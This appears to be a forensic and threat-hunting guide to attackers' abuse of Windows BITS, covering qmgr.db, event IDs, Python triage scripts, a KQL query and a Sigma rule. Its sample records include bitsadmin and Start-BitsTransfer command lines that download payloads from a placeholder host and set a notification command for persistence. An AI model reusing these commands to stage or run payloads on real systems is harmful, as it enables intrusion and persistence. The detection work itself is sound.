Artifact Analysis: BITS (Background Intelligent Transfer Service)
1. The Adversarial Appeal of BITS
To understand why BITS is a staple in modern cyberattacks (from ransomware affiliates to APTs), analysts must look at its architectural advantages:
- Trusted Execution (Firewall Evasion): BITS transfers are executed by a legitimate Windows service hosted within svchost.exe -k netsvcs. Host-based firewalls and EDRs rarely block outbound HTTP/HTTPS traffic originating from this core OS process, making it an ideal proxy for fetching malicious payloads.
- Extreme Resilience: BITS is designed to handle network interruptions. If a machine reboots or loses connection, the BITS job is paused and will automatically resume once connectivity is restored. This provides built-in persistence for the download/upload process.
- Stealth (Idle Bandwidth): BITS prioritizes user experience by only utilizing “idle” bandwidth. This prevents massive network spikes that would typically alert network monitoring tools (NDR) during data exfiltration.
- Command Execution (Persistence): BITS supports a feature called SetNotifyCmdLine. An attacker can configure a BITS job to execute a specific command or script immediately after a transfer finishes or fails, transforming a simple download manager into a highly reliable persistence mechanism.
2. Artifact Location & Structure
BITS activity is primarily tracked in two locations: an internal database and dedicated Windows Event Logs.
A. The BITS Database (qmgr.db)
The core forensic artifact is the active queue manager database.
- Path: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db (older systems may use qmgr0.dat and qmgr1.dat).
- Format: Extensible Storage Engine (ESE) database.
- Forensic Value: This database retains a historical record of BITS jobs. Extracting and parsing this file reveals:
- The Job Name and Description.
- The Source URL (the external C2 or staging server).
- The Destination Path (where the payload was dropped on disk).
- Timestamps (Creation, Modification, Completion).
- Notification Command Line (Any payload executed upon job completion).
- The User SID of the account that requested the job.
B. Windows Event Logs
BITS maintains an operational log that tracks the lifecycle of every transfer.
- Log Path: Applications and Services Logs > Microsoft > Windows > Bits-Client > Operational
- Key Event IDs:
- Event ID 59: BITS started a transfer job. (Contains the URL and destination file).
- Event ID 60: BITS stopped transferring data. (Indicates completion or failure).
- Event ID 16411: (On modern Windows 10/11) Provides rich context, including the name of the process that initiated the job request.
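The three event IDs above only become useful once they are stitched back into per-job lifecycles: a 59 with no matching 60 is a transfer that was interrupted or is still running, and the 16411 process context tells you who asked for the job. The script below is an added example (not code from the original page); it assumes the events have already been exported from the EVTX into flat records, and the field names used (id, time, job, url, process, status) are a constructed, simplified schema rather than the exact EventData names Windows emits, so map your exporter's columns onto them.

```python
"""Rebuild BITS job lifecycles from exported Bits-Client/Operational events.

Added example, not from the original page. Field names are a constructed,
simplified schema; the sample events below are constructed as well.
"""
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Constructed sample export: one benign updater job, one job requested by a
# script host over cleartext HTTP, and one job that started but never stopped.
SAMPLE_EVENTS = [
    {"id": 16411, "time": "2024-05-01T10:00:00", "job": "Edge Update",
     "url": "https://msedge.example-vendor.test/update.cab", "process": "MicrosoftEdgeUpdate.exe"},
    {"id": 59, "time": "2024-05-01T10:00:01", "job": "Edge Update",
     "url": "https://msedge.example-vendor.test/update.cab"},
    {"id": 60, "time": "2024-05-01T10:00:09", "job": "Edge Update",
     "url": "https://msedge.example-vendor.test/update.cab", "status": "0x0"},
    {"id": 16411, "time": "2024-05-01T11:12:00", "job": "svc",
     "url": "http://203.0.113.7/u.txt", "process": "powershell.exe"},
    {"id": 59, "time": "2024-05-01T11:12:01", "job": "svc",
     "url": "http://203.0.113.7/u.txt"},
    {"id": 60, "time": "2024-05-01T11:12:03", "job": "svc",
     "url": "http://203.0.113.7/u.txt", "status": "0x0"},
    {"id": 59, "time": "2024-05-01T11:30:00", "job": "orphan",
     "url": "http://203.0.113.7/b.dat"},  # no event 60: interrupted or still running
]

# Script hosts that rarely have a legitimate reason to create BITS jobs (constructed list).
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}


@dataclass
class BitsJob:
    name: str
    url: str
    started: Optional[datetime] = None          # from Event ID 59
    stopped: Optional[datetime] = None          # from Event ID 60
    status: Optional[str] = None                # HRESULT reported with Event ID 60
    initiating_process: Optional[str] = None    # from Event ID 16411

    @property
    def duration_s(self) -> Optional[float]:
        if self.started and self.stopped:
            return (self.stopped - self.started).total_seconds()
        return None


def build_timeline(events: List[dict]) -> Dict[Tuple[str, str], BitsJob]:
    """Group events by (job name, URL) and fill in start/stop/process context."""
    jobs: Dict[Tuple[str, str], BitsJob] = {}
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO-8601 sorts lexically
        key = (ev["job"], ev["url"])
        job = jobs.setdefault(key, BitsJob(ev["job"], ev["url"]))
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 16411:
            job.initiating_process = ev.get("process")
        elif ev["id"] == 59:
            job.started = ts
        elif ev["id"] == 60:
            job.stopped = ts
            job.status = ev.get("status")
    return jobs


def suspicious_jobs(jobs: Dict[Tuple[str, str], BitsJob]) -> List[Tuple[BitsJob, List[str]]]:
    """Return jobs worth a closer look, each with the reasons it was flagged."""
    flagged = []
    for job in jobs.values():
        reasons = []
        if (job.initiating_process or "").lower() in SCRIPT_HOSTS:
            reasons.append("script-host initiator")
        if job.url.lower().startswith("http://"):
            reasons.append("cleartext http")
        if job.started and not job.stopped:
            reasons.append("no completion event")
        if reasons:
            flagged.append((job, reasons))
    return flagged


if __name__ == "__main__":
    timeline = build_timeline(SAMPLE_EVENTS)
    for job, reasons in suspicious_jobs(timeline):
        print(f"{job.name:12} {job.url:45} {job.duration_s} s  {', '.join(reasons)}")
```

Keying on (job name, URL) is a simplification: a real job can carry several files, so when your exporter provides the BITS job GUID, key on that instead and treat the URL as a per-file attribute.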
3. DFIR Investigation Strategy
When investigating a suspected compromise, BITS analysis provides the critical link between network activity and file execution.
- Acquire & Parse the Database: Because qmgr.db is an active ESE database, it is locked by the OS. Analysts must use a raw disk reader or Volume Shadow Copy (VSS) to acquire it. Once acquired, use a specialized tool like BitsParser or KAPE to convert the ESE tables into a human-readable CSV.
- Analyze Artifacts: Review the parsed database for anomalous destination extensions. A BITS job that downloads a .dat or .txt file but saves it to disk as C:\Users\Public\update.exe is a definitive indicator of compromise.
- Cross-Artifact Correlation:
- Network Pivot: Take the extracted Source URLs and query your proxy/firewall logs to identify other infected hosts.
- Execution Pivot: Take the Destination Path and query Prefetch (.pf) and Amcache to prove whether the dropped payload was subsequently executed.
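The "Analyze Artifacts" and "Cross-Artifact Correlation" steps above are mechanical enough to script over the CSV that BitsParser or KAPE produces. The following is an added example, not code from the page or from either tool: it takes parsed qmgr.db rows, applies the extension-mismatch check together with two further triage checks (a notification command line being set, and a destination in a world-writable staging directory), then emits the host and path lists needed for the network and execution pivots. The column names (JobName, SourceURL, DestinationPath, NotifyCmdLine, UserSID) are a constructed schema; rename them to match your parser's headers.

```python
"""Triage parsed qmgr.db rows and build pivot lists for correlation.

Added example, not the page's code. Column names are a constructed schema and
the sample rows are constructed; only the .exe/.dll/.cab paths are realistic.
"""
import ntpath
import posixpath
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

# Destination extensions that mean "this file will be executed or loaded".
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".msi"}
# Path fragments of directories any user can write to (lower-case, backslash-delimited).
STAGING_DIRS = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Constructed rows in the shape a CSV export of qmgr.db might give.
SAMPLE_ROWS = [
    {"JobName": "Windows Update job", "SourceURL": "https://dl.delivery.example.test/kb500.cab",
     "DestinationPath": r"C:\Windows\SoftwareDistribution\Download\kb500.cab",
     "NotifyCmdLine": "", "UserSID": "S-1-5-18"},
    {"JobName": "svc", "SourceURL": "http://203.0.113.7/u.txt",
     "DestinationPath": r"C:\Users\Public\update.exe",
     "NotifyCmdLine": r"C:\Users\Public\update.exe", "UserSID": "S-1-5-21-1111-2222-3333-1001"},
    {"JobName": "loader", "SourceURL": "http://203.0.113.7/b.dat",
     "DestinationPath": r"C:\ProgramData\svc\b.dll",
     "NotifyCmdLine": "", "UserSID": "S-1-5-18"},
]


def _source_ext(url: str) -> str:
    # Extension of the URL path only, so query strings do not confuse the check.
    return posixpath.splitext(urlparse(url).path)[1].lower()


def _dest_ext(path: str) -> str:
    return ntpath.splitext(path)[1].lower()  # ntpath handles Windows paths on any host


def triage(rows: List[dict]) -> List[Tuple[dict, List[str]]]:
    """Return (row, reasons) for every row that trips at least one check."""
    findings = []
    for row in rows:
        reasons = []
        src, dst = _source_ext(row["SourceURL"]), _dest_ext(row["DestinationPath"])
        if dst in EXECUTABLE_EXTS and src != dst:
            reasons.append(f"extension mismatch ({src or 'none'} -> {dst})")
        if row.get("NotifyCmdLine"):
            reasons.append("notification command line set")
        if any(mark in row["DestinationPath"].lower() for mark in STAGING_DIRS):
            reasons.append("writable staging directory")
        if reasons:
            findings.append((row, reasons))
    return findings


def pivots(findings: List[Tuple[dict, List[str]]]) -> Dict[str, Set[str]]:
    """Lists for the next steps: hosts for proxy/firewall logs, destination
    paths for Prefetch/Amcache, SIDs for account review."""
    return {
        "hosts": {urlparse(row["SourceURL"]).hostname for row, _ in findings},
        "paths": {row["DestinationPath"] for row, _ in findings},
        "sids": {row["UserSID"] for row, _ in findings},
    }


if __name__ == "__main__":
    found = triage(SAMPLE_ROWS)
    for row, reasons in found:
        print(f"{row['JobName']:20} {'; '.join(reasons)}")
    print(pivots(found))
```

The staging-directory check is deliberately noisy (plenty of legitimate installers write to ProgramData); it is there to rank rows, not to convict them, whereas an extension mismatch combined with a notification command line is the pattern the page calls a definitive indicator.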
4. Detection & Threat Hunting
While parsing the database is a post-mortem activity, SOC analysts can proactively hunt for BITS abuse by monitoring process execution telemetry. Adversaries typically interact with BITS using the bitsadmin.exe legacy tool or the modern Start-BitsTransfer PowerShell cmdlet.
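Before shipping a hunting rule it helps to run its matching logic over a handful of known-good and known-bad process-creation records, so that case handling, the persistence flag and the parent-process exclusion all behave as intended. The script below is an added example, not the page's KQL or Sigma content: it reimplements the same conditions (bitsadmin.exe with /transfer and an HTTP URL, /SetNotifyCmdLine, and the Start-BitsTransfer cmdlet, with sccm.exe and msiexec.exe parents suppressed) over constructed records whose field names (image, command_line, parent_image) are a simplified schema rather than any vendor's.

```python
"""Dry-run the bitsadmin / Start-BitsTransfer hunting logic on process records.

Added example, not from the original page. Records and field names are
constructed; the 203.0.113.0/24 addresses are documentation-range placeholders.
"""
import re
from typing import Dict, List, Tuple

PERSIST_FLAG = "/setnotifycmdline"
EXPECTED_PARENTS = {"sccm.exe", "msiexec.exe"}   # same exclusion as the page's KQL
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation records: two hits, one persistence hit, one
# benign enumeration, and one hit from an expected parent that should be suppressed.
SAMPLE_RECORDS = [
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"bitsadmin /transfer job1 /download /priority high http://203.0.113.7/u.txt C:\Users\Public\u.exe"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"bitsadmin /SetNotifyCmdLine job1 C:\Users\Public\u.exe NULL"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -c "Start-BitsTransfer -Source http://203.0.113.7/a.dat -Destination C:\Users\Public\a.dat"'},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "bitsadmin /list /allusers"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent_image": r"C:\Windows\CCM\sccm.exe",
     "command_line": r"bitsadmin /transfer pkg /download /priority normal https://dist.example.test/pkg.cab C:\Windows\Temp\pkg.cab"},
]


def classify(record: dict) -> Dict[str, List[str]]:
    """Apply the rule conditions to one record; returns hit names and any URLs seen."""
    cmd = record["command_line"].lower()
    image = record["image"].lower()
    parent = record.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    hits: List[str] = []
    if image.endswith("\\bitsadmin.exe") or "bitsadmin" in cmd:
        if "/transfer" in cmd and "http" in cmd:      # Sigma 'selection'
            hits.append("bitsadmin_download")
        if PERSIST_FLAG in cmd:                        # Sigma 'selection_persist'
            hits.append("bitsadmin_notify_cmdline")
    if "start-bitstransfer" in cmd:                    # PowerShell cmdlet branch of the KQL
        hits.append("powershell_bits_transfer")
    if hits and parent in EXPECTED_PARENTS:
        hits.append("suppressed:expected_parent")
    # URLs are pulled from the original-case command line for the network pivot.
    return {"hits": hits, "urls": URL_RE.findall(record["command_line"])}


def hunt(records: List[dict]) -> List[Tuple[dict, Dict[str, List[str]]]]:
    """Records that fire at least one condition and are not suppressed."""
    results = []
    for rec in records:
        res = classify(rec)
        if res["hits"] and not any(h.startswith("suppressed:") for h in res["hits"]):
            results.append((rec, res))
    return results


if __name__ == "__main__":
    for rec, res in hunt(SAMPLE_RECORDS):
        print(res["hits"], res["urls"], rec["command_line"][:60])
```

Note that the parent exclusion is applied after matching rather than in the filter, so suppressed records still carry their hit names; that makes it easy to audit what the allowlist is hiding before tuning it in production.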
```kql
// Detects suspicious usage of bitsadmin.exe and PowerShell BITS cmdlets
DeviceProcessEvents
| where ProcessCommandLine has_any ("bitsadmin", "Start-BitsTransfer")
// Look for common malicious flags (Transfer, Download, AddFile, SetNotifyCmdLine)
| where ProcessCommandLine has_any ("/transfer", "/create", "/addfile", "/SetNotifyCmdLine")
// Filter out expected administrative scripts if necessary
| where InitiatingProcessFileName !in~ ("sccm.exe", "msiexec.exe")
| project TimeGenerated, DeviceName, InitiatingProcessAccountName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```

```yaml
title: Suspicious Download via BITSAdmin
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: stable
description: Detects the usage of bitsadmin.exe to download files, a common LOLBAS technique for payload staging.
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\bitsadmin.exe'
        CommandLine|contains|all:
            - '/transfer'
            - 'http'
    # Optional: Add condition to detect SetNotifyCmdLine for persistence
    selection_persist:
        Image|endswith: '\bitsadmin.exe'
        CommandLine|contains: '/SetNotifyCmdLine'
    condition: selection or selection_persist
level: high
tags:
    - attack.defense_evasion
    - attack.t1197
```

References & Further Reading
- LOLBAS Project: BITSAdmin.exe
- FireEye / Mandiant: Tracking Malware with BITS
- Related Artifact: Event ID 4688 (Process Creation)
- Related Artifact: Amcache & RecentFileCache